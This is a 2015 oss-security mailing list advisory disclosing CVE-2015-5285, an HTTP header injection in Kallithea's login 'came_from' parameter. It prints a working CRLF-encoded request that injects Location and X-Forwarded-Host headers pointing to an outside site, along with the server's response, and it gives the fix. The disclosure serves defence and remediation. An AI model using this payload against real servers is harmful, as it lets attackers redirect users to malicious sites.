Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 2 Oct 2015 22:13:01 +0200
From: Andrew Shadura <andrew@...dura.me>
To: oss-security@...ts.openwall.com
Subject: CVE-2015-5285: Kallithea: HTTP header injection

HTTP header injection

Synopsis
========

A vulnerability has been found in Kallithea, allowing attackers to inject
arbitrary headers into the server response for certain URLs.

Description
===========

HTTP header injection was possible in login-related code of Kallithea,
allowing
attackers to inject arbitrary headers into the server responses.

The vulnerability affects the `came_from` `GET` parameter.

Example of a malicious request:

    GET
/_admin/login?came_from=1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk
HTTP/1.1
    Host: 192.168.0.28:8080
    Content-Length: 0
    Cache-Control: max-age=0
    Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Origin: http://192.168.0.28:8080
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.8
    Cookie:
kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438

Corresponding response:

    HTTP/1.1 302 Found
    Cache-Control: no-cache
    Content-Length: 411
    Content-Type: text/html; charset=UTF-8
    Date: Mon, 21 Sep 2015 13:58:05 GMT
    Location: http://192.168.0.28:8080/_admin/d47b5
    X-Forwarded-Host: http://zeroscience.mk
    Location: http://zeroscience.mk
    Pragma: no-cache
    Server: waitress

    <html>
     <head>
      <title>302 Found</title>
     </head>
     <body>
      <h1>302 Found</h1>
      The resource was found at <a href="http://192.168.0.28:8080/_admin/1
    X-Forwarded-Host: http://zeroscience.mk
    Location: http://zeroscience.mk ">http://192.168.0.28:8080/_admin/1
    X-Forwarded-Host: http://zeroscience.mk
    Location: http://zeroscience.mk </a>;
    you should be redirected automatically.


     </body>
    </html>

Impact
======

The bug allows an attacker to override important response headers,
possibly redirecting users
to a malicious website or make other middleware misbehave when it trusts
the response headers.

Resolution
==========

The Kallithea project has fixed this issue in the stable branch. Users
are recommended to
upgrade to the latest 0.3 release.

Affected versions
=================

The issue is present in Kallithea versions before 0.3.

Acknowledgments
===============

Thanks to Gjoko Krstic of Zero Science Lab for reporting this issue.

References
==========

[0] Kallithea Project
    <https://kallithea-scm.org/>

[1] CVE-2015-5285
    <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285>

[2] Kallithea: Security Notice CVE-2015-5285
    <https://kallithea-scm.org/security/cve-2015-5285.html>

[3] Mercurial changeset fixing the issue

<https://kallithea-scm.org/repos/kallithea/changeset/38d1c99cd0005c1df5a37692615356c918dbe068>

[4] Zero Science Lab
    <http://www.zeroscience.mk/en/>

-- 
Cheers,
  Andrew Shadura
  on behalf of Kallithea Security Team


Download attachment "signature.asc" of type "application/pgp-signature" (474 bytes)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ